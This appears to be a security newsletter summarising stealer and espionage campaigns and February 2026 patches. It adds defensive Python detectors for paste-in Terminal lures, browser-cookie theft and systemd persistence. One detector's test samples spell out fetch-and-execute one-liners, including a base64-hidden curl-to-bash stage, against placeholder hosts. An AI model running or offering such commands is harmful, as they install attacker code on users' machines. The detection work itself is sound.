TRENDING TOPICS FEB 11, 2026

Update: Cross-Platform Supply Chain Attack via Trusted Download Channels

A newly uncovered campaign tracked as RU-APT-ChainReaver-L is exploiting trusted download pathways to push malware at scale across Windows, macOS, and iOS. The actors are tampering with popular mirror and file-distribution portals, altering site code so people looking for legitimate files are quietly routed through attacker-managed redirection chains. Victims see familiar download pages, but prominent “sponsored” or oversized download buttons redirect them to malicious infrastructure rather than the intended destination. From there, the attack adapts to the visitor’s operating system, allowing the campaign to maintain a consistent front-end experience while delivering different payloads behind the scenes. On Windows, the chain commonly ends in archived bundles hosted on mainstream cloud storage services, packaged to appear as installers or common software downloads. Investigators characterize the operation as unusually large and complex, with a broad reach into both individual users and corporate environments.

The campaign also leverages compromised long-standing GitHub accounts to host malware through repositories presented as “cracks” and activation toolkits, complete with polished documentation and misleading “clean” claims to build confidence. Those repos often push victims onward to attacker-controlled pages hosted on trusted web platforms before final delivery, making the traffic appear routine to many defenses.

Windows payloads focus on stealing sensitive data, including browser logins, messaging content, crypto wallets, and local files, and then sending it to attacker servers. macOS victims are steered into social-engineering pages that instruct them to run a one-line Terminal command, enabling staged delivery that runs largely in memory and aims to steal high-value information, including cloud credentials and wallet access. iOS users are redirected to a VPN app listing linked to a suspicious publisher, then receive phishing prompts and malicious pop-ups after installation.

Recommended actions include blocking and closely monitoring downloads initiated from mirror portals, tightening controls around GitHub-sourced tools, treating verification prompts and one-line Terminal commands as high risk, enforcing application allow-listing for employee endpoints, increasing visibility into outbound data movement, and refreshing user training to discourage downloads of pirated or unverified software.

Update: Google Ads and Shared AI Chats Used to Deliver AMOS Stealer on macOS

Threat actors are pushing malicious “how-to” guidance through publicly shared ChatGPT and Grok conversations, then amplifying those pages through Google Search ads to reach macOS users. The trap often starts with an everyday search, where sponsored results lead to a convincing AI chat page that reads like real troubleshooting help. The instructions walk the user through copying a Terminal command that triggers the Atomic macOS Stealer (AMOS) infection, shifting the attack away from obvious fake downloads and toward “trusted” looking advice. Reports describe the command flow as pulling down and running a script in one step, sometimes using encoding to hide what it is doing. This approach blends legitimate platforms, advertising visibility, and user action into a delivery path that can bypass the caution people normally apply to unknown installers.

At the same time, macOS infostealers are maturing into an organized marketplace focused on browser data, Keychain secrets, and especially cryptocurrency access. Researchers also highlight a broader trend: stealer operators are targeting a large number of Chrome crypto extensions and pairing theft with wallet-themed phishing aimed at major wallet brands. Underground forums are promoting partner-based distribution models in which affiliates share profits, helping these campaigns spread faster and evolve. Separate reports show related macOS malware arriving as signed, notarized applications that can appear legitimate to built-in macOS checks, increasing the odds a user will proceed without hesitation.

Practical warning signs include anyone copying “fix” commands into Terminal that immediately fetch and execute code, and apps requesting sensitive access that do not match the task the user is trying to complete. Another useful signal is unexpected outbound connections from non-financial apps to blockchain-related infrastructure, which may indicate credential or wallet theft.

Recommended actions include restricting or reviewing the use of paid search results for support guidance, blocking risky command patterns on managed Macs, reinforcing helpdesk guidance to never run one-line Terminal fixes from the web, and increasing monitoring for unusual data access and outbound traffic that indicates information-stealing behavior.
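
Both of the campaigns above end the same way: a user pastes a one-line Terminal command that fetches and runs a script, sometimes with the real stage hidden behind base64. The following is an added example, not code from either report or from any vendor, of how a managed-Mac control or a helpdesk triage script could flag such commands before they run. It splits a command into pipeline stages, looks for a downloader feeding an interpreter, catches bash -c "$(curl ...)" substitutions, and decodes embedded base64 so the hidden stage can be inspected. The sample commands and the example.invalid hostnames are constructed for the demonstration.

```python
"""Flag shell one-liners that fetch and execute remote code, including base64-hidden stages.

Added example for triaging "paste this into Terminal" fixes; the sample commands and
the example.invalid host below are constructed, not indicators from the reports above.
"""
import base64
import binascii
import re

DOWNLOADERS = {"curl", "wget", "fetch", "nscurl"}
INTERPRETERS = {"sh", "bash", "zsh", "ksh", "dash", "python", "python3",
                "perl", "ruby", "node", "osascript"}
WRAPPERS = {"sudo", "nohup", "env", "exec", "command", "time", "caffeinate"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")      # long base64-looking tokens
SUBST_RE = re.compile(r"\$\(([^()]*)\)|`([^`]*)`")    # $(...) and `...` substitutions


def _program(stage: str) -> str:
    """Effective program of one pipeline stage, skipping sudo/env-style wrappers and VAR=value prefixes."""
    for tok in stage.strip().split():
        base = tok.rsplit("/", 1)[-1]
        if base in WRAPPERS or ("=" in tok and not tok.startswith("-")):
            continue
        return base
    return ""


def _split_pipeline(command: str) -> list[str]:
    """Split on unquoted single '|' so pipes inside quoted $(...) bodies stay with their stage."""
    stages, buf, quote = [], [], None
    for i, ch in enumerate(command):
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == "|" and command[i - 1:i] != "|" and command[i + 1:i + 2] != "|":
            stages.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    stages.append("".join(buf))
    return stages


def _decode_b64_tokens(command: str) -> list[str]:
    """Decode base64-looking tokens that yield printable text, so a hidden stage can be rescanned."""
    found = []
    for tok in B64_RE.findall(command):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="ignore")
        if text and all(c.isprintable() or c in "\n\t" for c in text):
            found.append(text)
    return found


def analyze(command: str, _depth: int = 0) -> list[str]:
    """Return the reasons a command looks like fetch-and-execute; an empty list means none were found."""
    reasons = []
    stages = [_program(s) for s in _split_pipeline(command)]

    # Rule 1: a downloader stage whose output reaches an interpreter later in the pipeline.
    for i, prog in enumerate(stages):
        later = [p for p in stages[i + 1:] if p in INTERPRETERS]
        if prog in DOWNLOADERS and later:
            reasons.append(f"{prog} output piped into {later[0]}")
            break

    # Rule 2: remote content expanded into the command line, e.g. bash -c "$(curl ...)" or eval `wget -qO- ...`.
    for m in SUBST_RE.finditer(command):
        inner = m.group(1) or m.group(2) or ""
        if any(_program(s) in DOWNLOADERS for s in _split_pipeline(inner)):
            reasons.append(f"command substitution fetches remote content: {inner.strip()}")

    # Rule 3: a decoder stage feeding an interpreter, e.g. echo <b64> | base64 -D | sh (-D is the macOS flag).
    if "base64" in stages and any(p in INTERPRETERS for p in stages[stages.index("base64") + 1:]):
        reasons.append("base64-decoded data piped into an interpreter")

    # Rule 4: decode embedded base64 and rescan it once, so the hidden stage is visible to the reviewer.
    if _depth < 1:
        for text in _decode_b64_tokens(command):
            hidden = analyze(text, _depth + 1)
            if hidden:
                reasons.append(f"hidden stage after base64 decode: {text.strip()!r} -> {hidden[0]}")
    return reasons


# Constructed samples: the first four mimic "paste this to fix it" lures, the rest are ordinary commands.
HIDDEN_STAGE = base64.b64encode(b"curl -fsSL https://example.invalid/a.sh | bash").decode()
SAMPLES = [
    ("curl -fsSL https://example.invalid/fix.sh | bash", True),
    ("wget -qO- https://example.invalid/x | sudo bash -s --", True),
    ('/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"', True),
    (f"echo {HIDDEN_STAGE} | base64 -D | sh", True),
    ("curl -fsSL https://example.invalid/notes.txt -o notes.txt", False),
    ("brew install wget", False),
    ("cat report.log | grep -i error | sort | uniq -c", False),
]


def check_samples() -> bool:
    """True when every constructed sample is classified the way it is labelled."""
    return all(bool(analyze(cmd)) == expected for cmd, expected in SAMPLES)


if __name__ == "__main__":
    for cmd, _ in SAMPLES:
        verdict = analyze(cmd)
        print(("RISKY " if verdict else "ok    ") + cmd)
        for reason in verdict:
            print("        - " + reason)
```

The decode step matters more than the pattern list: a reviewer who only sees echo <blob> | base64 -D | sh learns nothing about what runs, while the rescanned text names the downloader and the interpreter. Plain curl -o downloads and ordinary pipelines produce no findings, which keeps the check usable as a helpdesk gate rather than a blanket ban on Terminal.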

Socelars Stealer Targets Windows Sessions and Ad Accounts

Security teams are tracking Socelars, a Windows information-stealing trojan built to quietly capture access rather than disrupt systems. Its main value to attackers is stealing browser session data so they can reuse a victim’s already authenticated access to online services without needing the password. Public reporting links this activity to Facebook Ads Manager abuse, where stolen sessions can be used to execute ad account takeovers and cause immediate financial loss. Researchers also observed it targeting session cookies tied to major platforms, including Facebook and Amazon, which can be enough to hijack accounts, change settings, or run transactions.

Earlier waves spread through a fake PDF reader installer that looked legitimate in a workplace context, then operated in the background with minimal user-visible impact. Once run, the installer has been reported to create a local folder associated with the lure and proceed with data theft, with few obvious signs. On the technical side, Socelars has been observed pulling cookie data from common browsers by reading local cookie storage, then using that access to query advertising-related pages and extract identifiers and tokens that support continued access. Sandbox findings describe an initial phase of system checks and reconnaissance, followed by an attempt to elevate privileges using a User Account Control (UAC) bypass tied to Windows auto-elevation behavior. In the same activity, analysts saw it create a mutex named “patatoes” and contact the iplogger[.]org service, then terminate itself in a way that appears to be a normal crash, reducing the chance that a user investigates.

The business risk is straightforward: stolen ad access can be used to launch fraudulent campaigns, drain budgets, and resell compromised accounts, and the risk can expand further if billing details and payment information are also captured. Reports indicate the data of interest can include ad account identifiers, access tokens, session cookies, page details, spending limits, and payment-linked information that is easy to monetize quickly.

Organizations can reduce exposure by blocking untrusted PDF tool downloads, tightening endpoint controls to detect unusual access to browser cookie storage, enforcing strong sign-in protections for advertising accounts, and monitoring for unexpected ad activity and billing changes.
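
Two of the behaviors described above are visible in ordinary endpoint telemetry: a process that is not a browser opening a browser’s cookie store, and a DNS lookup for iplogger[.]org from that same process. The following is an added example, not part of the Socelars reporting, of correlating those two signals over a handful of constructed, normalized events. The field names (event, pid, image, target, query), sample paths and PIDs are assumptions. In a real deployment the file-access events would come from a Windows Security 4663 audit with a SACL set on the cookie databases (Sysmon’s FileCreate event records creation, not reads), and the DNS events from Sysmon event ID 22; the “patatoes” mutex is a sandbox observation and is not covered because standard telemetry does not log mutex creation.

```python
"""Correlate non-browser access to browser cookie stores with iplogger[.]org lookups.

Added example over constructed, normalized endpoint events; paths, PIDs and field
names are assumptions, not indicators taken from the Socelars reporting.
"""
import re
from collections import defaultdict

# Processes that legitimately open their own cookie database.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe", "vivaldi.exe"}

# Chromium keeps cookies in "<profile>\Cookies" or "<profile>\Network\Cookies"; Firefox uses cookies.sqlite.
COOKIE_STORE_RE = re.compile(
    r"\\user data\\[^\\]+\\(network\\)?cookies$|\\profiles\\[^\\]+\\cookies\.sqlite$",
    re.IGNORECASE,
)
# iplogger.org and any subdomain, as named in the reporting.
IPLOGGER_RE = re.compile(r"(^|\.)iplogger\.org$", re.IGNORECASE)


def _basename(image: str) -> str:
    """Lower-cased file name of a process image path (either slash style)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: list[dict]) -> list[dict]:
    """Group events by (pid, image) and return one finding per process that hit at least one rule.

    cookie_store_access: a non-browser process accessed a browser cookie database.
    iplogger_dns:        the process resolved iplogger.org.
    A process that hits both rules is rated "high"; one rule alone is "medium".
    """
    hits = defaultdict(lambda: {"rules": set(), "evidence": []})
    for ev in events:
        key = (ev["pid"], ev["image"])
        cookie_read = (ev["event"] == "file_access"
                       and COOKIE_STORE_RE.search(ev["target"]) is not None
                       and _basename(ev["image"]) not in BROWSERS)
        if cookie_read:
            hits[key]["rules"].add("cookie_store_access")
            hits[key]["evidence"].append(f'{ev["time"]} read {ev["target"]}')
        elif ev["event"] == "dns_query" and IPLOGGER_RE.search(ev["query"]):
            hits[key]["rules"].add("iplogger_dns")
            hits[key]["evidence"].append(f'{ev["time"]} resolved {ev["query"]}')

    findings = []
    for (pid, image), data in hits.items():
        findings.append({
            "pid": pid,
            "image": image,
            "rules": sorted(data["rules"]),
            "severity": "high" if len(data["rules"]) == 2 else "medium",
            "evidence": data["evidence"],
        })
    return findings


# Constructed sample events: a browser touching its own cookies (benign), a lure-named
# installer reading two browsers' cookie stores and calling iplogger.org, and unrelated noise.
STEALER = r"C:\Users\alice\AppData\Local\Temp\PDFReaderSetup.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
CHROME_COOKIES = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"
FIREFOX_COOKIES = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\k2x9q.default-release\cookies.sqlite"

EVENTS = [
    {"time": "2026-02-10T09:14:02Z", "event": "file_access", "pid": 1180, "image": CHROME, "target": CHROME_COOKIES},
    {"time": "2026-02-10T09:14:05Z", "event": "dns_query", "pid": 1180, "image": CHROME, "query": "www.example.com"},
    {"time": "2026-02-10T09:15:11Z", "event": "file_access", "pid": 4412, "image": STEALER, "target": CHROME_COOKIES},
    {"time": "2026-02-10T09:15:12Z", "event": "file_access", "pid": 4412, "image": STEALER, "target": FIREFOX_COOKIES},
    {"time": "2026-02-10T09:15:20Z", "event": "dns_query", "pid": 4412, "image": STEALER, "query": "iplogger.org"},
    {"time": "2026-02-10T09:16:00Z", "event": "file_access", "pid": 2201,
     "image": r"C:\Windows\System32\svchost.exe", "target": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(f'[{finding["severity"]}] pid {finding["pid"]} {finding["image"]}: {", ".join(finding["rules"])}')
        for line in finding["evidence"]:
            print("    " + line)
```

Cookie-store access on its own is noisy (backup agents and some password managers read these files), which is why the example keys on the process and only raises severity when the same process also resolves the logger service; a single-rule hit is worth a look, a two-rule hit is worth isolating the host.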

Defense Under Pressure: Espionage, Personnel Targeting, and Supply Chain Risk Converge

A Google Threat Intelligence Group (GTIG) assessment highlights a multi-front risk where state-backed groups and criminals target the defense industrial base through battlefield-adjacent systems, personnel devices, and global manufacturing networks that supply modern militaries. Attackers increasingly bypass enterprise monitoring by targeting individual soldiers and contractors, abusing device-linking features in encrypted messaging apps, and using highly tailored lures tied to drones and battlefield workflows. The activity spans multiple actor sets, with Russia-aligned groups targeting organizations connected to the Russia-Ukraine war, North Korean operations attempting to infiltrate firms through hiring pipelines, Iranian clusters running job-themed phishing at scale, and China-nexus actors driving high-volume espionage with a heavy focus on perimeter and edge devices. Supply chain exposure is expanding the blast radius, as extortion and hack-and-leak activity against manufacturers can disrupt production and spill over into defense programs, even when prime contractors are not the direct targets. The overall message is that compromise can happen well before systems reach the field, affecting design, procurement, and operations through people, vendors, and infrastructure that are not always treated as core security priorities.

Recent campaign observations reinforce this direction by showing how a mature espionage ecosystem targeting Indian government and defense entities continues to evolve across both Windows and Linux. Researchers report active phishing operations delivering Windows payloads through shortcut and script-based attachments that trigger stealthy execution paths and establish resilient persistence for long-term access. On Linux, a separate track used a downloader to deploy a Python-based remote access tool that profiles hosts, enumerates files, and exfiltrates data while persisting through system services to survive reboots. They also observed a newer tool delivered through a malicious PowerPoint add-in that emphasizes detailed host monitoring and continuous command-and-control, signaling experimentation with new delivery routes that blend into normal workflows.

Together, these findings align with GTIG’s view that the greatest danger lies in sustained access and intelligence collection, not in fast, noisy disruption. Organizations can reduce risk by hardening edge and perimeter systems, tightening hiring and vendor onboarding controls, and expanding monitoring to cover personal and contractor devices used for mission work. They should also operationalize threat intelligence into proactive hunting and incident response, reinforce training that targets job-themed lures and “productivity” add-ins, and validate supply chain security requirements down to smaller manufacturers and service providers.
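
The Linux track described above survives reboots by registering itself as a system service. The following is an added example, not from the GTIG assessment or the cited research, of a triage check for that pattern on a host or in a collected image: it parses systemd unit text, pulls out ExecStart, and flags units that run an interpreter against a script in a user-writable or hidden location, that are installed in a per-user systemd directory, or that pin the process up with Restart=always. The unit files and their paths are constructed for the demonstration; the interpreter list and the set of suspect directories are starting points, not a vendor rule.

```python
"""Triage systemd units for interpreter-backed persistence launched from user-writable paths.

Added example; the unit files below are constructed, not samples from the reporting.
"""
import re
from pathlib import PurePosixPath

INTERPRETER_RE = re.compile(r"^(python[\d.]*|perl|sh|bash|dash|zsh|node|ruby)$")
# A packaged service does not run code from these locations; anything here deserves a look.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/", "/run/user/")
# Per-user unit directories: persistence here needs no root at all.
USER_UNIT_DIRS = ("/.config/systemd/user/", "/.local/share/systemd/user/")


def parse_unit(text: str) -> dict[str, list[str]]:
    """Flatten a unit file into {"Section.Key": [values...]}; systemd allows repeated keys."""
    result, section = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, _, value = line.partition("=")
        result.setdefault(f"{section}.{key.strip()}", []).append(value.strip())
    return result


def _is_hidden(path: str) -> bool:
    """True when any component of an absolute path is a dot-directory or dot-file."""
    return any(part.startswith(".") for part in PurePosixPath(path).parts)


def triage_unit(unit_path: str, text: str) -> list[str]:
    """Return the reasons a unit looks like persistence; an empty list means nothing stood out."""
    unit = parse_unit(text)
    reasons = []
    for exec_line in unit.get("Service.ExecStart", []):
        # systemd allows prefixes such as "-" (ignore failure) and "@"; strip them before splitting.
        argv = exec_line.lstrip("-@!:+").split()
        if not argv:
            continue
        program = PurePosixPath(argv[0]).name
        script = next((a for a in argv[1:] if a.startswith("/")), "")
        if INTERPRETER_RE.match(program) and script:
            if script.startswith(SUSPECT_DIRS):
                reasons.append(f"{program} runs script from user-writable path: {script}")
            if _is_hidden(script):
                reasons.append(f"{program} runs script from hidden directory: {script}")
        if argv[0].startswith(SUSPECT_DIRS):
            reasons.append(f"ExecStart binary lives in user-writable path: {argv[0]}")
    if any(d in unit_path for d in USER_UNIT_DIRS):
        reasons.append("unit installed in a per-user systemd directory (no root needed)")
    if reasons and "always" in unit.get("Service.Restart", []):
        reasons.append("Restart=always keeps the process alive after it is killed")
    return reasons


# Constructed unit files: a packaged Python daemon, a RAT-style unit hidden under a home
# directory, and a per-user unit wrapping a script in /tmp.
PACKAGED_UNIT = """[Unit]
Description=Example packaged agent

[Service]
ExecStart=/usr/bin/python3 /usr/lib/example-agent/agent.py
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""

SUSPECT_UNIT = """[Unit]
Description=System Sync Service

[Service]
ExecStart=/usr/bin/python3 /home/dev/.cache/.sync/update.py
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
"""

USER_UNIT = """[Service]
ExecStart=/bin/sh -c /tmp/.x/run.sh
"""

SAMPLE_UNITS = {
    "/etc/systemd/system/example-agent.service": PACKAGED_UNIT,
    "/etc/systemd/system/system-sync.service": SUSPECT_UNIT,
    "/home/dev/.config/systemd/user/sync.service": USER_UNIT,
}


def triage_all(units: dict[str, str]) -> dict[str, list[str]]:
    """Triage a {unit_path: unit_text} mapping, e.g. one built by globbing the systemd directories."""
    return {path: triage_unit(path, text) for path, text in units.items()}


if __name__ == "__main__":
    for path, reasons in triage_all(SAMPLE_UNITS).items():
        print(("SUSPECT " if reasons else "ok      ") + path)
        for reason in reasons:
            print("        - " + reason)
```

A benign Python daemon shipped in /usr/lib produces no findings, so the check does not punish the many legitimate services written in Python; what it keys on is where the code lives and who could have written it there. On a live host, build the mapping by reading every *.service under /etc/systemd/system, /run/systemd/system and each user's ~/.config/systemd/user, then compare the flagged units against package ownership (dpkg -S or rpm -qf) before escalating.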

Patch Tuesday Update

Microsoft has released its February 10 Patch Tuesday updates, addressing security vulnerabilities across Windows, Microsoft Office, and Azure services. The release includes fixes for five flaws rated Critical, all in Azure services, that could enable elevation of privilege or information disclosure if left unpatched. It also resolves six zero-day vulnerabilities that Microsoft reports were exploited in the wild, three of which were publicly disclosed before a fix was available, which increases the urgency of prioritizing deployment. The zero-days are rated High or Medium and cover security feature bypasses in Windows Shell, MSHTML, and Microsoft Word, elevation of privilege in Desktop Window Manager and Remote Desktop Services, and a denial of service in Windows Remote Access Connection Manager.

February 2026 Patch Tuesday - Critical and Zero-Day Vulnerabilities

Severity  CVE             Zero-Day  Title
--------  --------------  --------  -----------------------------------------------------------------------------------------------
Critical  CVE-2026-21522  No        Microsoft ACI Confidential Containers Elevation of Privilege Vulnerability (Azure Compute Gallery)
Critical  CVE-2026-21532  No        Azure Function Information Disclosure Vulnerability
Critical  CVE-2026-23655  No        Microsoft ACI Confidential Containers Information Disclosure Vulnerability (Azure Compute Gallery)
Critical  CVE-2026-24300  No        Azure Front Door (AFD) Elevation of Privilege Vulnerability
Critical  CVE-2026-24302  No        Azure Arc Elevation of Privilege Vulnerability
High      CVE-2026-21510  Yes       Windows Shell Security Feature Bypass Vulnerability
High      CVE-2026-21513  Yes       MSHTML Framework Security Feature Bypass Vulnerability
High      CVE-2026-21514  Yes       Microsoft Word Security Feature Bypass Vulnerability
High      CVE-2026-21519  Yes       Desktop Window Manager Elevation of Privilege Vulnerability
High      CVE-2026-21533  Yes       Windows Remote Access Connection Manager Denial of Service Vulnerability
Medium    CVE-2026-21525  Yes       Windows Remote Desktop Services Elevation of Privilege Vulnerability

Totals: 11 CVEs listed (5 Critical, 5 High, 1 Medium); 6 Zero-Days.
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.